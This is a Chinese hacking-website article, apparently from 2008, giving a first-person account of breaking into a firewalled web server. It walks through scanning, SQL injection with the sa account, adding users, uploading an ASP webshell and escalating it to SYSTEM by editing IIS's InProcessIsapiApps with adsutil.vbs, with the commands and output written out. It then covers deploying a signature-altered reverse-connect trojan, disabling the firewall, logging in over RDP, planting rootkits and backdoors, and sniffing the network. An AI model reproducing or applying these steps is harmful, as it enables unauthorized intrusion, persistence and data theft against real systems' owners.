当前位置: 代码网 > 服务器>网络安全>脚本攻防 > 对有防火墙主机的入侵渗透

对有防火墙主机的入侵渗透

2008年10月08日 脚本攻防 我要评论
对有防火墙主机的入侵渗透 一、踩点ping [url=http://www.xxx.com]www.xxx.com[/url] 发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。... 08-10-08
一、踩点
ping
[url=http://www.xxx.com]www.xxx.com[/url]
发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。
二、注入
从源文件里搜索关键字asp,找到了一个注入点。用nbsi注入,发现是sa口令登陆,去加了一个用户,显示命令完成。哈哈,看来管理员太粗心了。先上传一个webshell,上传了一个老兵的asp木马,接下来的就是个人习惯了,我平时入侵的习惯是先上传webshell,然后再把webshell提升为system权限,因为这样说可以说在入侵之时会非常的方便,我个人觉得这个方法非常好。
三、提升权限
先看哪些特权的:
cscript c:\inetpub\adminscripts\adsutil.vbs get /w3svc/inprocessisapiapps
得到:
microsoft (r) windows 脚本宿主版本 5.1 for windows
版权所有(c) microsoft corporation 1996-1999. all rights reserved.
inprocessisapiapps : (list) (5 items)
"c:\winnt\system32\idq.dll"
"c:\winnt\system32\inetsrv\httpext.dll"
"c:\winnt\system32\inetsrv\httpodbc.dll"
"c:\winnt\system32\inetsrv\ssinc.dll"
"c:\winnt\system32\msw3prt.dll"
把把asp.dll加进去:
cscript c:\inetpub\adminscripts\adsutil.vbs
set /w3svc/inprocessisapiapps "c:\winnt\system32\idq.dll" "c:\winnt\system32
\inetsrv\httpext.dll" "c:\winnt\system32\inetsrv\httpodbc.dll" "c:\winnt\system32
\inetsrv\ssinc.dll" "c:\winnt\system32\msw3prt.dll""c:\winnt\system32
\inetsrv\asp.dll"
然后用asp木马加个用户,显示命令完成。
四、terminalservice
接下来就是开3389了,用net start显示,发现已开了ts服务,但端口上没有3389,觉得可能是改端口了,但事实上它们欺骗我的感情。
我用netstat -an察看了一下,发现有3389,再从net start 里发现是对方的防火墙搞的鬼。算了,上传个木马吧,上传了一个改了特征码的20cn反弹木马。然后用木马在gui 下关掉了防火墙,再用3389登陆器登了上去。这里我这样做是因为我知道管理员一定不会在旁边,而对于这个时候,比较老道的方法大家可以用fpipe实现端口重定向,或者用httptunnel,和黑防里面说的那样,不过我试过没有成功过一次。还有一种工具是despoxy,(tcp tunnel for http proxies),大家有兴趣的话可以去试一下,它可以穿透http代理。
五、简单后门
1、改了fso名,这样是让我自己享受,这个有system权限的马儿。
2、放了几个rootkit和几个网络上少见的后台。
3、我个从是不喜欢多放后台,觉得很烦。
六、sniffer
1.ts界面下,down了些嗅探器。先arpsniffer图形的看了一下,没有一台内网机子。又看了一个外网,整个ip段都是。看来我的运行不错嘛。打开webdavscan查了一下,只有两三个ip是网站,而且是很小型的,接下来就没有什么动力了。
(0)

相关文章:

  • DNS(域名服务器)欺骗技术

    DNS(域名服务器)欺骗技术

    DNS(域名服务器)欺骗技术 概述:什么是DNS欺骗?DNS欺骗是一门改变DNS原始指向IP的艺术。为了更好的理解,让我们先来看一个例子。如果你想用浏览器去g... [阅读全文]
  • 通过自解压包来实现入侵

    通过自解压包来实现入侵

    通过自解压包来实现入侵 用自解压包删光别人的硬盘,相信大家都会。我给大家介绍个用自解压包入侵的方法。如果捆绑一个木马给别人,只要稍有常识的人有杀毒软件就可以识... [阅读全文]
  • 用“电驴”抓肉鸡

    用“电驴”抓肉鸡

    用“电驴”抓肉鸡 我用“电驴”抓肉鸡!!难道是放一个“电驴”在路上,等“火鸡”过来,一... [阅读全文]
  • 黑客在线之经典入侵技术总结 (一)

    黑客在线之经典入侵技术总结 (一)

    黑客在线之经典入侵技术总结 (一) 简 介在网入侵中,我总结一下,以下几种常见漏洞入方法和补久措施。By:啤酒盖 相传,在神奇的网络世界中,有一群习惯了昼伏夜... [阅读全文]
  • 轻松学会入侵网络服务器

    轻松学会入侵网络服务器

    轻松学会入侵网络服务器 尽管为服务器设计软件的软件工程师们想方设法提高系统的安全性,然而由于系统管理员的水平参差不齐或安全意识底下,往往给黑客提供了入侵的机会... [阅读全文]
  • 黑客在线之经典入侵技术总结 (二)

    黑客在线之经典入侵技术总结 (二)

    黑客在线之经典入侵技术总结 (二) 二、 神话Webdav   入侵难度:★★★(中等)   存在范围:★★★★(高)   危险指数:★★★★★(很高)   ... [阅读全文]

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com